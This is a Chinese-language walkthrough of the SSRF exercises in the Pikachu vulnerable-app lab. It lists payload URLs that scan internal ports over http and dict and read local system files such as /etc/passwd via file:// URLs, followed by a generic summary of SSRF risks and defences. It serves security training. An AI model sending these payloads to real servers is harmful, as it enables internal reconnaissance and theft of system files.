pikachu_ssrf攻略

ssrf(curl):

打开pikachu靶场:

http://127.0.0.1/pikachu-master/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1/pikachu-master/vul/ssrf/ssrf_info/info1.php

发现URL地址最后面是info1.php 猜测一下有没有可能存在info2.php?

尝试修改访问地址: 

因为curl支持很多协议(http,file想,dict等),尝试访问一下:

文件访问(http)

比如说修改url为:?url=http://www.baidu.com,访问百度页面?url=http://www.baidu.com/robots.txt,访问百度文件等

?url=http://www.baidu.com
?url=http://www.baidu.com/img/bd_logo.png
?url=http://www.baidu.com/robots.txt

端口扫描(http,dict)

使用dict协议可以获取内网主机开放端口相应服务的指纹信息,比如说主机开了http端口

?url=http://127.0.0.1:80
?url=http://127.0.0.1:3306
?url=dict://127.0.0.1:3306
?url=http://10.10.10.1:22
?url=http://10.10.10.1:6379

读取本地文件(file)

修改url为:?url=file:///etc/passwd,查看文件的内容:

?url=file:///c:/windows/system32/drivers/etc/hosts
?url=file:///etc/passwd
?url=file:/c:/www/ssrf/ssrf_curl.php

ssrf(file_get_content)

首先了解什么是file_get_content的使用:

file_get_contents() 把整个文件读入一个字符串中。
语法:file_get_contents(path,include_path,context,start,max_length)

进行协议测试:

文件读取

读取本地信息?file=file:///c:/1.txt

http协议请求内网资源 

?file=http://127.0.0.1/ssrf/ssrf_curl.php读取文件内容

  • 6
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pikachu中的SSRF(Server-Side Request Forgery)漏洞可以通过不受信任的用户输入来构造恶意请求,并导致服务器对外部资源的未授权访问。 在pikachu中,SSRF漏洞主要表现为通过构造URL或使用file_get_contents函数来访问远程资源。文章中提到了两种主要的SSRF漏洞形式:SSRF(URL)和SSRF(file_get_contents)。 在SSRF(URL)中,击者可以利用不受信任的输入构造URL,通过服务器发起对外部资源的请求。这种漏洞可以导致击者访问内部网络、绕过防火墙、获取敏感信息等。 在SSRF(file_get_contents)中,击者可以构造恶意的URL参数,通过file_get_contents函数获取远程资源内容。这种漏洞可以用于读取文件、执行任意代码等。 在pikachu中,可能会存在一个漏洞页面,该页面接受一个名为url的参数,并使用curl库来访问该参数指定的URL。击者可以通过构造恶意的URL参数来利用SSRF漏洞进行击。例如,击者可以构造一个URL参数为'http://127.0.0.1/pikachu/vul/ssrf/ssrf_info/info1.php'的请求,从而获取该URL返回的内容。 为了防止SSRF漏洞的利用,开发者应该始终对用户输入进行严格的验证和过滤。可以使用白名单机制来限制可以访问的URL,或者使用特定的URL解析器来解析用户输入的URL,并确保只允许访问合法的URL。此外,还可以对URL参数进行限制,禁止访问内部网络地址和私有IP地址。 总结起来,pikachu中的SSRF漏洞是一种安全风险,击者可以通过构造恶意的URL或使用file_get_contents函数来访问远程资源,并可能导致服务器对外部资源的未授权访问。开发者应该谨慎处理用户输入,进行严格的验证和过滤,以及限制可访问的URL范围,来防止这种漏洞的利用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值